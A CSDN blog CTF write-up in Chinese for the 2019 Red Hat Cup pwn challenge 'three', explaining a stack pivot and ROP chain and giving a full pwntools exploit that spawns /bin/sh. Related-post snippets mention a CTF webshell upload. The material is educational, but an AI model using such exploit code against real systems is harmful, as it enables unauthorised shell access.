红帽杯three

最新推荐文章于 2021-01-23 20:55:34 发布
最新推荐文章于 2021-01-23 20:55:34 发布
阅读量293 收藏
点赞数
分类专栏: exploit pwn 文章标签: exp pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010334666/article/details/103889699
版权
pwn 同时被 2 个专栏收录
10 篇文章 0 订阅
订阅专栏
exploit
8 篇文章 0 订阅
订阅专栏

title: 红帽杯three
tags:

  • pwn
  • 二进制
  • writeup
  • 红帽杯
  • 2019
    categories:
  • writeup
    abbrlink: 633c637e
    date: 2019-11-15 17:24:38

新博客链接

three

这道题我开始用了jmp ecx。。可能基础没打好吧,让我真正理解nx保护的就是这道了,为什么rop能绕过nx保护,因为rop利用的是ret一个地址,然后这个地址是本身存在代码的,而我那样是直接执行代码,错误的方式

漏洞点

3字节的任意代码执行,我想到了栈迁移,可是用的是jmp ecx,太菜了,技术不娴熟
这题有个小技巧,没开pie并且是写入bss段,所以/bin/sh可以自己写入后确认位置,所以直接execve("/bin/sh", NULL, NULL),基础rop的题目。。。

其中,该程序是 32 位,所以我们需要使得

系统调用号,即 eax 应该为 0xb
第一个参数,即 ebx 应该指向 /bin/sh 的地址,其实执行 sh 的地址也可以。
第二个参数,即 ecx 应该为 0
第三个参数,即 edx 应该为 0

然后ROPgadget搞下寄存器就好了
bin_sh用find找到

exp

#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
import subprocess

local = 1
host = '127.0.0.1' 
port = 10000
context.log_level = 'debug'
exe = './pwn'
context.binary = exe
elf = ELF(exe)
libc = elf.libc


#don't forget to change it
if local:
    io = process(exe)
else:
    io = remote(host,port)

s    = lambda data            : io.send(str(data))
sa   = lambda delim,data      : io.sendafter(str(delim), str(data))
sl   = lambda data            : io.sendline(str(data))
sla  = lambda delim,data      : io.sendlineafter(str(delim), str(data))
r    = lambda numb=4096       : io.recv(numb)
ru   = lambda delim,drop=True : io.recvuntil(delim, drop)
uu32 = lambda data            : u32(data.ljust(4, '\x00'))
uu64 = lambda data            : u64(data.ljust(8, '\x00'))
lg   = lambda s,addr          : io.success('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))


# break on aim addr
def debug(addr,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(io.pid)).readlines()[1], 16)
        gdb.attach(io,'b *{}'.format(hex(text_base+addr)))
    else:
        gdb.attach(io,"b *{}".format(hex(addr)))

# get_one_gadget
def one_gadget(filename):
    return map(int, subprocess.check_output(['one_gadget', '--raw', filename]).split(' '))
#one_gadget = one_gadget(libc.path)



#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================

# Arch:     i386-32-little
# RELRO:    Partial RELRO
# Stack:    No canary found
# NX:       NX enabled
# PIE:      No PIE (0x8048000)

def exp():
    sla(":", "3")
    payload = asm('''
                  mov esp, ecx
                  ret
                  ''')
    sa("!", payload)
    sla(":", 500)
    gdb.attach(io, "finish\n finish\nn 5")
    sh_addr = 0x080c777d
    int80 = 0x08049903
    pop_edx_ecx_ebx = 0x08072fb1
    pop_eax = 0x080c11e6
    shellcode = flat([
        pop_eax,
        0xb,
        pop_edx_ecx_ebx,
        0,
        0,
        0x80f6cdd,
        int80
    ])


    sl(shellcode + '\x00' + '/bin/sh\x00')


if __name__ == '__main__':
    exp()
    io.interactive()
NoOneGroup
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
红帽杯wp红帽杯wp
05-06
红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp
2019 红帽杯 three 经验总结
qq_43189757的博客
11-11 1379
这题感觉要对汇编语言要比较熟悉会更容易做出来… 程序逻辑分析: 前两个函数通过读取flag文件的内容, 并将存放flag的chunk的地址放入bss段中 在程序中可以输入3个字节的指令, 之后再执行这三个指令, 所以目的是植入3个字节的shellcode来获取flag 利用思路: 通过调试发现在执行call eax 之前, ecx寄存器中存放的是bss段的地址0x80f6cc0, 而前面...
[2019红帽杯]easyRE
weixin_52034946的博客
01-23 302
64位ida,7.0的,(最近用7.5老抽风,好多数据我都找不到) 查看字符串,发现三个特殊的字符 其中那个ABCD肯定是base64加密了,跟进去主要看一看这个函数名字,是sub_400E44 其他俩个跟进去就是主函数了. 分析主函数 sub_4406E0 这个代码基本上是看不懂的,但是可以注意到里面有一个sys_read ,可以猜测是读取字符串内容的 sub_424BA0,这个进去看内容其实我也看不懂,但是根据下面的for循环可以判断出,这个是读取字符串长度的,尤其是这一步可以判读这点 因为这是fo
2019年第三届红帽杯线上赛wp
SkYe's Blog
11-16 1567
2019年第三届红帽杯线上赛wp PWN three IDA打开之后,函数名都是sub_xxx,然后通过nc官方部署的程序(或本地在程序所在目录创建flag文件后),获得程序中会出现的字符串定位到了重要函数,我用的是字符串Maybe is good。 贴出来一下重要函数对应的内存地址: 函数名(已重命名) 内存地址 main 0x08048CA8 load_flag 0x080...
第二届红帽杯线上初赛 RedHat 2018 WriteUp
郁离歌丶的博客
05-02 5691
又是一个划水的比赛,作看高中生吊打全场orz,太强了。WEBsimple upload进入一个登陆页面,抓包之后发现cookie有admin=0改成1之后进入了一个上传页面,获取指纹之后,明显是Apache Tomcat,传一个一句话asp马过去试试。上传yulige.jsp.jpg<% if("023".equals(request.getParameter("pwd"))){ ...
第三届红帽杯线上初赛Misc题之Advertising for Marriage
mid2dog
11-13 1807
除校赛外初次参加ctf比赛…我好菜orz 不过还是很开心体验了回生活,收获了个中二狗和荷兰猪的双人战队哈哈哈 好了,来讲讲这道征婚题目吧,真的哭了出来,明明就差一点… 对了,想做这道题的可以去守夜人ctf平台,网址如下http://ctf.heikanet.com/ 首先看下载过来的文档格式,发现是raw,然后百度了下发现是拍照格式,下载了acdsee发现打不开 于是我用linux虚拟机binw...
2019红帽杯恶臭的数据包.7z
11-11
2019红帽杯恶臭的数据包
2018红帽杯线上预选赛MISC文件--NotOnlyWireshark_ed63b63425ec3ed09470d8715b208293.zip
05-03
2018红帽杯线上预选赛MISC文件()Not Only WiresharkNotOnlyWireshark_ed63b63425ec3ed09470d8715b208293.zip
第四届红帽杯网络安全大赛-线上赛Writeup1
08-03
第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛 - 线上赛 Writeup 第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛-
红帽RHCSA的详尽笔记
08-15
红帽RHCSA的详尽笔记打算要考RHCSA然后报了一个班,这是我自己记录的笔记,我感觉挺详细的,希望对你们有帮助,包括配置网卡、yum源、创建用户、用户组、创建cron作业等等,可以搭配我的文章一起看,对初学Linux和考...
2019红帽杯(RedHat)【Broadcastc & 恶臭的数据包】writeup
chen574927274的博客
11-11 2793
首先请原谅我这么菜,只解了两道题还来发Blog; 【Broadcastc】 这题不多说,直接解压得到task.py打开获取flag 【恶臭的数据包】 首先下载压缩包解压得到数据包 Wireshark打开什么都看不懂,直接百度; 按照教程 把数据包丢到Kali 先看看ESSID 然后再破解WiFi密码 得到WiFi密码 12345678 打开Wireshark 编辑-...
simple upload-2018红帽杯
Xi4or0uji
05-03 289
进去登录看见登录框,随便乱输登下试下,然后登录不成功,看到cookie是0 改下cookie的值然后再登录 看见文件上传,随便上传文件,说只能上传jpg/png格式的 试下上传jpg的话是可以在浏览器访问到上传的图片 看报错看到后台只解析java 写个lll.jsp脚本挂个木马上去,这里要用burpsuite改下代理 请求 http://d3d8314a86e94...
pwnable.kr 入门pwn系列教程(1)
NoOneGroup
07-24 3090
博客已经转移 https://noone-hub.github.io/ 前言: 前段时间学了一段时间pwn,因为某些事断了下来,现在开始重新学习,现在立志要真正入门pwn,会编写漏洞利用(利用pwntools),会基本linux命令,因为pwn题目很多都是在linux下的,比较少在windows下。 正文: 今天通过pwnable.kr的第一道题目fd来学习pwn 题目就是这样,题目最...
unctf2019 pwn部分题解
NoOneGroup
01-08 1542
unctf2019 pwn部分题解 新博客链接 babyheap easy,不讲了 #!/usr/bin/env python2 # -*- coding: utf-8 -*- from pwn import * local = 1 host = '127.0.0.1' port = 10000 context.log_level = 'debug' exe = '/tmp/tmp.spk5n...
pwnable.kr学习pwn系列(2)
NoOneGroup
07-24 1336
博客已经转移 https://noone-hub.github.io/ 由上一节教会的动作,我就不提了,直接贴上代码 #include <stdio.h> #include <string.h> unsigned long hashcode = 0x21DD09EC; unsigned long check_password(const char* p){ int...
pwnable.kr入门pwn系列教程(3)
NoOneGroup
07-26 709
博客已经转移 https://noone-hub.github.io/ 题目不多讲,直接贴代码,如果不会这些个过程看前面教程 #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key){ char overflowme[32]; printf("overf...
linux下rop的利用
NoOneGroup
11-25 407
博客已经转移 https://noone-hub.github.io/ 等我复现完最近几道比较难的rop后再来写总结,最近没时间写
TJCTF之 Tilted Troop
NoOneGroup
08-30 388
博客已经转移 https://noone-hub.github.io/ 倒不是说这题目有多难,是我太菜,从中学到了点东西,发出来理清下思路,记录下 先贴上主函数代码 int __cdecl main(int argc, const char **argv, const char **envp) { __gid_t rgid; // ST04_4@1 char *v4; // rb...
TJCTF之Secure Secrets
NoOneGroup
09-11 345
博客已经转移 https://noone-hub.github.io/ 百度你查的到的writeup都是说很简单,然后给代码,对于我等新手很不友好,谷歌搜索可以搜索到详细的writeup,也是解释的一半一半,对于新手也不是很友好,看了个youtube的视频,发觉讲的不错,代码简洁,最后懂了,不过就是全英文的,有点难听懂 回到正题:这道题可以用ida打开,审查代码发觉有格式化字符串漏洞,或者自...
虚拟机红帽Linux安装
最新发布
10-08
虚拟机中安装红帽Linux可以按照以下步骤进行操作: 1. 首先,确保你已经安装了虚拟机软件,比如VMware Workstation或者Oracle VirtualBox。 2. 下载红帽Linux的ISO镜像文件,可以从红帽官网下载或者其他可信的来源...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值